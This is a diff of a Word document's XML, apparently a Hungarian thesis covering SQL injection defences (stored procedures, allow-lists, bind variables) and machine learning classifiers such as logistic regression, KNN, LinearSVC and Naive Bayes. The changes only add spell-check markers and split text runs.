+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>procedures</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6983,6 +7947,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6991,6 +7956,7 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7104,7 +8070,25 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+        <w:t>Engedélyezőlista (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>allow-list</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) bemenetének ellenőrzése</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7222,7 +8206,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („bind variables”).</w:t>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>bind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7336,13 +8348,23 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">tableName </w:t>
+        <w:t>tableName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7737,12 +8759,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>supervised</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7767,12 +8791,14 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>unsupervised</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7791,12 +8817,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>reinforcement</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8121,7 +9149,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„train”</w:t>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8145,7 +9187,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>. A címkézett adatok (train)</w:t>
+        <w:t>. A címkézett adatok (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9020,7 +10076,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> osztályozás (classification) és</w:t>
+        <w:t xml:space="preserve"> osztályozás (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classification</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) és</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9032,7 +10102,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
+        <w:t xml:space="preserve"> regresszió (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9150,7 +10234,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (independent variables)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>independent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9192,7 +10304,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (dependent variable)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dependent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9228,6 +10368,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc71471971"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9237,9 +10378,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Logistic Regression</w:t>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9371,18 +10537,34 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic Regression</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -9467,12 +10649,28 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear Regression</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10022,7 +11220,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>logisztikai szigmoid függvény</w:t>
+        <w:t xml:space="preserve">logisztikai </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szigmoid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> függvény</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10198,8 +11410,45 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Nearest Neighbors</w:t>
-      </w:r>
+        <w:t>K-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Nearest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Neighbors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10755,7 +12004,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A távolság megtalálásának leggyakoribb módja az euklid</w:t>
+        <w:t xml:space="preserve">A távolság megtalálásának leggyakoribb módja az </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>euklid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10767,7 +12023,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>szi távolság</w:t>
+        <w:t>szi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> távolság</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11214,7 +12477,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>n-dimenziós euklidészi távolság képlete</w:t>
+        <w:t xml:space="preserve">n-dimenziós </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>euklidészi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> távolság képlete</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11253,6 +12530,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="17" w:name="_Toc71471973"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11273,8 +12551,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ear </w:t>
-      </w:r>
+        <w:t>ear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11284,8 +12563,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Support Vector</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11295,8 +12575,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>Support</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11306,8 +12587,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11317,8 +12599,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>LinearSVC</w:t>
-      </w:r>
+        <w:t>Vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11328,6 +12611,41 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>LinearSVC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="17"/>
@@ -11358,14 +12676,29 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>z S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">upport </w:t>
-      </w:r>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>upport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11376,8 +12709,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ector </w:t>
-      </w:r>
+        <w:t>ector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11390,6 +12731,7 @@
         </w:rPr>
         <w:t>achine</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11426,6 +12768,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11444,6 +12787,7 @@
         </w:rPr>
         <w:t>C</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11466,7 +12810,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(hyperplane) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hyperplane</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12312,6 +13670,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Gaussian </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12321,9 +13680,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Naive Bayes</w:t>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="18"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12345,7 +13729,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A Naiv Bayes a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
+        <w:t xml:space="preserve">A Naiv </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12357,7 +13755,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csoportja, amely a Bayes-tételen alapul</w:t>
+        <w:t xml:space="preserve"> csoportja, amely a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-tételen alapul</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12381,7 +13793,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv Bayes-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
+        <w:t xml:space="preserve">Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12829,11 +14255,33 @@
         </w:rPr>
         <w:t xml:space="preserve">s ábra: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive Bayes tétele</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tétele</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12859,17 +14307,33 @@
         </w:rPr>
         <w:t xml:space="preserve">Háromféle </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Bayes osztályozó létezik</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztályozó létezik</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12925,17 +14389,33 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
